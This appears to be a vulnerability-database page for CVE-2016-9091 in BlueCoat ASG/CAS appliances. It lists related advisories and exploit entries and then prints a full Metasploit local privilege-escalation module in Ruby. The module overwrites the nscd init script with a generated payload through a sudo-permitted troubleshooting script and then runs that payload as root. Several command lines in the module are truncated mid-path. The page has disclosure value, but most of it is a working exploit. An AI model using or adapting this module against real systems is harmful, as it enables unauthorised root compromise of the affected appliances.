OS Command Injection Vulnerability in ASG and CAS (CVE-2016-9091)

🗓️ 13 Apr 2017 00:00:00Reported by RootType

OS Command Injection Vulnerability in ASG and CAS (CVE-2016-9091). Vulnerability allows authenticated admin to execute arbitrary OS commands with the privileges of the management console service

Reporter	Title	Published	Views	Family All 15
0day.today	Bluecoat ASG 6.6/CAS 1.3 - OS Command Injection Exploit	4 Apr 201700:00	–	zdt
0day.today	Bluecoat ASG 6.6/CAS 1.3 - Privilege Escalation Exploit	4 Apr 201700:00	–	zdt
Circl	CVE-2016-9091	3 Apr 201700:00	–	circl
CNVD	Bluecoat ASG 6.6/CAS OS Command Injection Vulnerability Vulnerability	5 Apr 201700:00	–	cnvd
Check Point Advisories	Blue Coat ASG Command Injection (CVE-2016-9091)	23 Feb 202100:00	–	checkpoint_advisories
CVE	CVE-2016-9091	5 Apr 201715:00	–	cve
Cvelist	CVE-2016-9091	5 Apr 201715:00	–	cvelist
Exploit DB	Bluecoat ASG 6.6/CAS 1.3 - OS Command Injection (Metasploit)	3 Apr 201700:00	–	exploitdb
Exploit DB	Bluecoat ASG 6.6/CAS 1.3 - Local Privilege Escalation (Metasploit)	3 Apr 201700:00	–	exploitdb
exploitpack	Bluecoat ASG 6.6CAS 1.3 - OS Command Injection (Metasploit)	3 Apr 201700:00	–	exploitpack


                                                require 'msf/core'
require 'rex'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/exe'
 
 
class Metasploit4 < Msf::Exploit::Local
  Rank = AverageRanking
 
  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Exploit::Local::Linux
 
  def initialize(info={})
    super( update_info( info, {
        'Name'          => 'BlueCoat CAS 1.3.7.1 tomcat->root privilege escalation (via mvtroubleshooting.sh)',
        'Description'   => %q{
          This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate
          privileges. In order to work, a tomcat session with access to sudo on the sudoers
          is needed. This module is useful for post exploitation of BlueCoat
          vulnerabilities, where typically web server privileges are acquired, and this
          user is allowed to execute sudo on the sudoers file.
        },
        'License'        => MSF_LICENSE,
        'Author'       => [
         'Chris Hebert <chrisdhebert[at]gmail.com>',
         'Pete Paccione <petepaccione[at]gmail.com>',
         'Corey Boyd <corey.k.boyd[at]gmail.com>'
        ],
        'DisclosureDate' => 'Vendor Contacted 8-31-2016',
        'References'     =>
        [
          ['EDB', '##TBD##'],
          ['CVE', '2016-9091' ],
          ['URL', 'http://https://bto.bluecoat.com/security-advisory/sa138']
        ],
        'Platform'       => %w{ linux unix },
        'Arch'           => [ ARCH_X86 ],
        'SessionTypes'   => [ 'shell', 'meterpreter' ],
        'Targets'        =>
          [
            [ 'Linux x86',       { 'Arch' => ARCH_X86 } ]
          ],
        'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
        'DefaultTarget' => 0,
      }
      ))
    register_options([
        OptString.new("WritableDir", [ false, "A directory where we can write files", "/var/log" ]),
      ], self.class)
  end
 
  def check
    id=cmd_exec("id -un")
    if id!="tomcat"
      print_status("#{peer} - ERROR - Session running as id= #{id}, but must be tomcat")
      fail_with(Failure::NoAccess, "Session running as id= #{id}, but must be tomcat")
    end
 
    clprelease=cmd_exec("cat /etc/clp-release | cut -d \" \" -f 3")
    if clprelease!="1.3.7.1"
      print_status("#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1")
      fail_with(Failure::NotVulnerable, "BlueCoat version #{clprelease}, but must be 1.3.7.1")
    end
 
    return Exploit::CheckCode::Vulnerable
  end
  def exploit
    print_status("#{peer} - Checking for vulnerable BlueCoat session...")
    if check != CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1")
    end
 
    print_status("#{peer} - Running Exploit...")
    exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
    write_file(exe_file, generate_payload_exe)
    cmd_exec "chmod +x #{exe_file}"
 
    begin
      #Backup original nscd init script
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$
      #Replaces /etc/init.d/nscd script with meterpreter payload
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$
      #Executes meterpreter payload as root
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh"
      #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1)
    ensure
      #Restores original nscd init script
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$
      #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it)
      cmd_exec "/bin/rm -f #{exe_file}"
    end
    print_status("#{peer} - The exploit module has finished")
    #Maybe something here to deal with timeouts?? noticied inconsistant..  Exploit failed: Rex::TimeoutError Operation timed out.
 
  end
end

13 Apr 2017 00:00Current

7.7High risk

Vulners AI Score7.7

EPSS0.10126